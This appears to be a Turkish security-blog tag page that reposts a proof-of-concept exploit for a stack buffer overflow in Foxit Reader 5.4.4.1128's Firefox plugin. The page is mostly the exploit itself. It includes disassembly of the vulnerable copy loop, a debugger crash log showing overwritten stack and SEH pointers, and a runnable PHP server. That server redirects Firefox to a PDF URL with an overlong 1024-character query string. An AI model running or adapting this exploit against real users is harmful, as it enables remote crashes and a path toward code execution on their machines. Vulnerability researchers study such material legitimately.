Tag Archive for Foxit Reader 5.4.4.1128 exploit

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow Açığına ilişkin açıklamalama exploit aşağıdaki gibidir.


<?php /* Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong Query String Remote Stack Buffer Overflow PoC --------------------------- rgod

(listener)

Tested against Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll Version: 2.2.1.530

Product url: <a href="http://www.foxitsoftware.com/downloads/">http://www.foxitsoftware.com/downloads/</a> Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage: Launch from the command line, then browse port 6666 with Firefox. You can test it also through this url:

<a href="http://192.168.0.1/x.pdf?[A">http://192.168.0.1/x.pdf?[A</a> x 1024]

File must be existing or the server should be responding with the proper Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------  L1000162F:     push ebx     push esi     push edi     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     xor ebx,ebx     xor esi,esi     repne scasb     not ecx     dec ecx     test ecx,ecx     jle L100016E4  L1000164A:     mov al,[esi+ebp]     mov word ptr [esp+18h],0000h     cmp al,25h     jz  L10001661     mov ecx,[esp+1Ch]     mov [ebx+ecx],al     jmp L100016CE  L10001661:     mov al,[esi+ebp+01h]     cmp al,30h     jl  L1000166D     cmp al,39h     jle L1000167D  L1000166D:     cmp al,41h     jl  L10001675     cmp al,46h     jle L1000167D  L10001675:     cmp al,61h     jl  L100016C6     cmp al,66h     jg  L100016C6  L1000167D:     mov dl,[esi+ebp+01h]     inc esi     inc esi     lea ecx,[esp+10h]     mov [esp+18h],dl     push ecx     mov al,[esi+ebp]     lea edx,[esp+1Ch]     push L100450D4     push edx     mov [esp+25h],al     call SUB_L10006421     mov eax,[esp+1Ch]     lea ecx,[esp+24h]     push eax     push L100450D0     push ecx     call SUB_L100063CF     mov eax,[esp+34h]     mov dl,[esp+30h]     add esp,00000018h     mov [ebx+eax],dl     jmp L100016CE  L100016C6:     mov ecx,[esp+1Ch]     mov byte ptr [ebx+ecx],25h  L100016CE:     inc ebx     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     inc esi     repne scasb     not ecx     dec ecx     cmp esi,ecx     jl  L1000164A  L100016E4:     mov edx,[esp+1Ch]     pop edi     pop esi     mov eax,00000001h     mov byte ptr [ebx+edx],00h     pop ebx     pop ebp     pop ecx     retn ;------------------------------------------------------------------------------

this copy loop ends up in overwriting stack pointers, then (by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8 eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202 npFoxitReaderPlugin!NP_GetEntryPoints+0x15672: 10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=???????? ... Attempt to write to address 41414141 ...

also SEH pointers are overwritten */

error_reporting(0);

set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".                 "Server: Apache\r\n".                 "Location: /x.pdf?".str_repeat("A",1024)."\r\n".                 "Content-Type: text/html\r\n\r\n";

$____boom     = "HTTP/1.1 200 OK\r\n".                 "Server: Apache\r\n".                 "Accept-Ranges: bytes\r\n".                 "Content-Length: 60137\r\n".                 "Content-Type: application/pdf\r\n".                 "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {   echo "$errstr ($errno)\n"; } else {   echo "Listening on public tcp port ".$port." \n";    while ($conn = stream_socket_accept($socket)) {     $line=fgets($conn);     echo $line."\n";     if (strpos($line,".pdf")){       fwrite($conn,$____boom);     }     else {       fwrite($conn,$____redirect);     }     fclose($conn);   }   fclose($socket); } ?>